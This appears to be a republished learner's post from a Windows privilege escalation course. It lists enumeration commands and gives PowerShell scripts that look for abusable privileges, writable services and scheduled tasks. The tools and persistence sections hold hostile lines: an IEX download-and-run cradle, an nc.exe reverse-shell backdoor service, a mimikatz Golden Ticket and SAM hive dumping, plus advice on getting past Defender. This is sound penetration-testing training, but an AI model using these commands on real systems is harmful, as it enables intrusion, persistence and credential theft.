Windows Privilege Escalation Course: Key Enumeration Techniques


I decided to go back and continue this course. It doesn’t hurt to watch the videos and take great notes along the way. It will only make me stronger in the end!

👉 This is what I worked on today:

✅ System Enumeration

✅ User Enumeration

✅ Network Enumeration

✅ Password Hunting

✅ AV Enumeration

🎆 Next up, Exploring Automated Tools! 👨‍💻 🤓

You Should Know:

1. System Enumeration Commands

Gather OS, patch and service details to spot missing patches and misconfigured services:

systeminfo                                   (OS name, version, build, architecture, hotfixes)
wmic qfe list brief                          (installed patches; compare the newest InstalledOn with the build date)
wmic logicaldisk get name,size,freespace     (drives; extra volumes often hold backups or installers worth searching)
wmic service list brief                      (services with state and PID; the starting point for the service checks further down)

wmic is deprecated and is no longer installed by default on current Windows 11 builds; the PowerShell equivalents are Get-HotFix, Get-CimInstance Win32_LogicalDisk and Get-CimInstance Win32_Service.

2. User Enumeration

Extract user details and privileges:

whoami /priv                     (token privileges; SeImpersonate, SeAssignPrimaryToken, SeBackup, SeRestore, SeTakeOwnership, SeDebug and SeLoadDriver each give a direct route to SYSTEM)
net user                         (local accounts)
net localgroup administrators    (local admins; on non-English systems the group name is localized)
wmic useraccount list full       (SIDs, disabled and locked-out flags, PasswordRequired)

3. Network Enumeration

Discover network settings and connections:

ipconfig /all      (interfaces, DNS, domain suffix; a second interface means a second network to pivot into)
arp -a             (neighbours this host has recently talked to)
netstat -ano       (active connections and listeners with PIDs; a service bound only to 127.0.0.1 is reachable through port forwarding even though the external scan never saw it)
route print        (routes to other subnets)

4. Password Hunting

Search for passwords in files and the registry (memory comes later, with mimikatz):

findstr /si password *.txt *.xml *.ini     (case-insensitive, recursive; the wildcards matter, without them findstr looks for files literally named .txt)
reg query HKLM /f password /t REG_SZ /s    (string values containing "password"; repeat against HKCU)

5. AV Enumeration

Identify security software before dropping tooling on disk, since winPEAS, mimikatz and nc.exe are all well known to Defender:

sc query windefend                          (Defender service state)
tasklist /svc | findstr /i "av defender"    (findstr ORs space-separated words; a | inside the quotes is matched literally, so "av|defender" finds nothing)
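As an added example that is not code from the course or the original post, here are the five manual steps above combined into one PowerShell triage function. It assumes stock Windows PowerShell 5.1 or PowerShell 7 cmdlets on the target and a low-privileged shell; the function name, the output property names and the list of "abusable" privileges are my own choices.

```powershell
# Added example, not code from the course or the post: the five manual steps above
# as one triage function built on stock cmdlets (it works where wmic is gone).
# Assumptions: run as the low-privileged user being assessed; Windows PowerShell 5.1
# or PowerShell 7 on Windows; no third-party modules.

function Get-PrivEscTriage {
    # 1. System: build and age of the newest hotfix. A long gap is the first hint
    #    that a public kernel/LPE exploit for this build may apply; confirm manually.
    $os     = Get-CimInstance Win32_OperatingSystem
    $newest = Get-HotFix | Sort-Object InstalledOn -Descending | Select-Object -First 1
    $patchAgeDays = if ($newest.InstalledOn) { (New-TimeSpan -Start $newest.InstalledOn -End (Get-Date)).Days }

    # 2. User: privileges that lead to SYSTEM on their own (potato-style impersonation,
    #    backup/restore of SAM and SYSTEM, driver loading). whoami /priv prints CSV
    #    with /fo csv, which ConvertFrom-Csv turns into objects. A Disabled state does
    #    not matter: the token holder can enable its own privileges.
    $abusable = 'SeImpersonatePrivilege','SeAssignPrimaryTokenPrivilege','SeBackupPrivilege',
                'SeRestorePrivilege','SeTakeOwnershipPrivilege','SeDebugPrivilege',
                'SeLoadDriverPrivilege','SeManageVolumePrivilege'
    $privs = whoami /priv /fo csv | ConvertFrom-Csv |
             Where-Object { $abusable -contains $_.'Privilege Name' }
    # IsInRole is false for an admin running under UAC at medium integrity, so the
    # Administrators membership is listed too (well-known SID, survives localization).
    $principal = [Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()
    $isAdmin   = $principal.IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)
    $admins    = Get-LocalGroupMember -SID 'S-1-5-32-544' -ErrorAction SilentlyContinue |
                 ForEach-Object Name

    # 3. Network: listeners bound to loopback only are invisible to the outside scan
    #    and are the usual port-forwarding targets (databases, admin consoles).
    $localOnly = Get-NetTCPConnection -State Listen |
                 Where-Object { $_.LocalAddress -in '127.0.0.1','::1' } |
                 ForEach-Object {
                     $p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
                     '{0}/{1}' -f $_.LocalPort, $p.ProcessName
                 }

    # 4. Password hunting: saved credentials (usable with runas /savecred) and autologon.
    $saved    = cmdkey /list | Select-String 'Target:' | ForEach-Object { $_.Line.Trim() }
    $winlogon = Get-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon' `
                -Name DefaultUserName, DefaultPassword -ErrorAction SilentlyContinue

    # 5. AV: Defender state plus any registered product (SecurityCenter2 exists on client SKUs only).
    $defender = Get-MpComputerStatus -ErrorAction SilentlyContinue
    $avNames  = Get-CimInstance -Namespace root/SecurityCenter2 -ClassName AntiVirusProduct `
                -ErrorAction SilentlyContinue | ForEach-Object displayName

    [pscustomobject]@{
        OS              = '{0} {1} {2}' -f $os.Caption, $os.Version, $os.OSArchitecture
        NewestHotfix    = $newest.HotFixID
        PatchAgeDays    = $patchAgeDays
        IsElevatedAdmin = $isAdmin
        LocalAdmins     = $admins
        AbusablePrivs   = $privs.'Privilege Name'
        LoopbackOnly    = $localOnly
        SavedCreds      = $saved
        AutoLogonUser   = $winlogon.DefaultUserName
        AutoLogonPwSet  = [bool]$winlogon.DefaultPassword
        DefenderRTP     = $defender.RealTimeProtectionEnabled
        AVProducts      = $avNames
    }
}

Get-PrivEscTriage | Format-List
```

The function returns one object rather than printing, so it can be piped to Export-Clixml or ConvertTo-Json for the report; every cmdlet that may be missing on a given SKU (local accounts, Defender, SecurityCenter2) is called with -ErrorAction SilentlyContinue so the triage finishes on servers and hardened builds.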

Automated Tools for PrivEsc

  • WinPEAS: `.\winpeas.exe quiet`
  • PowerUp.ps1:
    IEX(New-Object Net.WebClient).DownloadString("http://<IP>/PowerUp.ps1"); Invoke-AllChecks 
    
  • Seatbelt: `.\Seatbelt.exe -group=all`

What Undercode Say:

Privilege escalation is a critical phase in penetration testing. Mastering manual enumeration (wmic, net, reg) alongside tools like WinPEAS and PowerUp ensures thorough assessment. Always check:
– Unquoted service paths (wmic service get name,pathname,startmode): a path with spaces and no quotes is only exploitable when the service is auto-start, runs as a privileged account, and one of the directories the SCM searches first is writable by you
– Weak service and autorun permissions: reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run lists what runs at logon, but reg query shows no ACLs; the permission check is write access on each binary, its directory and the service registry key, with accesschk.exe or Get-Acl
– Scheduled tasks (schtasks /query /fo LIST /v): read "Run As User" and test whether the "Task To Run" binary or its folder is writable
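An added example that is not from the course or the post: the three "always check" items above as one PowerShell script, using stock cmdlets instead of wmic and accesschk. It assumes a low-privileged shell on the target; Test-Writable, Get-UnquotedPathCandidates, New-Finding and the finding names are my own, and the ACL test is a deliberate simplification (Allow ACEs only, Deny ACEs ignored), so confirm hits with accesschk before building on them.

```powershell
# Added example, not the course's or the post's own code: unquoted service paths,
# weak service/autorun permissions and scheduled tasks checked with stock cmdlets.
# Assumptions: run as the low-privileged user being assessed. Test-Writable only
# looks at Allow ACEs for the current token's SIDs and ignores Deny ACEs, so it can
# over-report; confirm with accesschk.exe before relying on a finding.

$fileWrite = [Security.AccessControl.FileSystemRights]'Write, Delete, ChangePermissions, TakeOwnership, FullControl'
$regWrite  = [Security.AccessControl.RegistryRights]'SetValue, CreateSubKey, Delete, ChangePermissions, TakeOwnership, FullControl'
$id        = [Security.Principal.WindowsIdentity]::GetCurrent()
$mySids    = @($id.User.Value) + @($id.Groups | ForEach-Object { $_.Value })

# $true if an Allow ACE for the current user or one of their groups grants a
# write-type right on a file, directory or registry key.
function Test-Writable {
    param([string]$Path)
    if (-not (Test-Path -LiteralPath $Path)) { return $false }
    $acl = Get-Acl -LiteralPath $Path -ErrorAction SilentlyContinue
    if (-not $acl) { return $false }
    $isReg = $Path -like 'HK*:*'
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        try   { $sid = $ace.IdentityReference.Translate([Security.Principal.SecurityIdentifier]).Value }
        catch { continue }
        if ($mySids -notcontains $sid) { continue }
        $hit = if ($isReg) { [int]$ace.RegistryRights -band [int]$regWrite }
               else        { [int]$ace.FileSystemRights -band [int]$fileWrite }
        if ($hit) { return $true }
    }
    return $false
}

# Binaries the SCM tries before the real one when a path with spaces is unquoted:
# C:\Program Files\My App\svc.exe -> C:\Program.exe, C:\Program Files\My.exe
function Get-UnquotedPathCandidates {
    param([string]$PathName)
    $p = $PathName.Trim()
    if ($p.StartsWith('"')) { return @() }                      # quoted: not vulnerable
    $m = [regex]::Match($p, '^(.*?\.exe)\b', 'IgnoreCase')       # strip arguments
    if (-not $m.Success -or $m.Groups[1].Value -notmatch ' ') { return @() }
    $parts = $m.Groups[1].Value -split ' '
    foreach ($i in 1..($parts.Count - 1)) {
        ($parts[0..($i - 1)] -join ' ') + '.exe'
    }
}

function New-Finding($Check, $Name, $Target, $RunsAs) {
    [pscustomobject]@{ Check = $Check; Name = $Name; Target = $Target; RunsAs = $RunsAs }
}

$findings = @()
foreach ($svc in Get-CimInstance Win32_Service) {
    if (-not $svc.PathName) { continue }
    # 1. Unquoted service path: only a hit if a directory the SCM searches first is writable.
    foreach ($cand in Get-UnquotedPathCandidates $svc.PathName) {
        if (Test-Writable (Split-Path $cand -Parent)) {
            $findings += New-Finding 'UnquotedPath' $svc.Name $cand $svc.StartName
        }
    }
    # 2. Weak permissions: a writable binary can be replaced; a writable service key
    #    lets us repoint ImagePath. Both need a restart or reboot to fire.
    $bin = [regex]::Match($svc.PathName, '^"?(.*?\.exe)', 'IgnoreCase').Groups[1].Value
    if ($bin -and (Test-Writable $bin)) { $findings += New-Finding 'WritableBinary' $svc.Name $bin $svc.StartName }
    $key = "HKLM:\SYSTEM\CurrentControlSet\Services\$($svc.Name)"
    if (Test-Writable $key)           { $findings += New-Finding 'WritableServiceKey' $svc.Name $key $svc.StartName }
}
# 3. Scheduled tasks: a writable action binary runs as the task principal (often SYSTEM).
foreach ($t in Get-ScheduledTask | Where-Object { $_.State -ne 'Disabled' }) {
    foreach ($a in $t.Actions) {
        if (-not $a.Execute) { continue }                       # COM-handler actions have no Execute
        $exe = [Environment]::ExpandEnvironmentVariables($a.Execute.Trim('"'))
        if ([IO.Path]::IsPathRooted($exe) -and (Test-Writable $exe)) {
            $findings += New-Finding 'WritableTaskBinary' "$($t.TaskPath)$($t.TaskName)" $exe $t.Principal.UserId
        }
    }
}
# Autoruns: a writable HKLM Run key executes whatever we add as the next user to log on.
$runKey = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run'
if (Test-Writable $runKey) { $findings += New-Finding 'WritableRunKey' 'Run' $runKey 'next logon user' }

$findings | Sort-Object Check | Format-Table -AutoSize
```

The RunsAs column is what makes a finding worth pursuing: a writable path for a service or task that already runs as your own user gains nothing, while LocalSystem, NT AUTHORITY\SYSTEM or a domain account is the target.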

For persistence, the post points to Golden Tickets (mimikatz.exe "kerberos::golden") and backdoor services (sc create evilservice binpath= "nc.exe -e cmd.exe <IP> <PORT>"). Two caveats: a Golden Ticket is domain persistence and needs the krbtgt hash, so it follows a Domain Controller compromise, not a local SYSTEM shell; and a bare nc.exe is not a service binary, so it never registers with the service control dispatcher, the SCM reports error 1053 and the shell dies after the start timeout of roughly 30 seconds. Use a real service executable (msfvenom's exe-service format) or a wrapper that launches the payload as a child, and expect Defender to flag nc.exe on disk.

Expected Output:

A structured report detailing:

  • Missing patches (wmic qfe), mapped to the public local exploits for that build
  • Misconfigured services (accesschk.exe /accepteula -uwcqv "Authenticated Users" *, plus the unquoted-path and writable-binary checks)
  • Stored credentials (cmdkey /list; saved entries are usable with runas /savecred)
  • Exportable registry hives (reg save HKLM\SAM sam.bak together with reg save HKLM\SYSTEM system.bak, since SAM can only be decrypted with the SYSTEM boot key; both need an elevated shell, so this is proof of escalation rather than a way to achieve it)

Reported By: Todd Mattran – Hackers Feeds
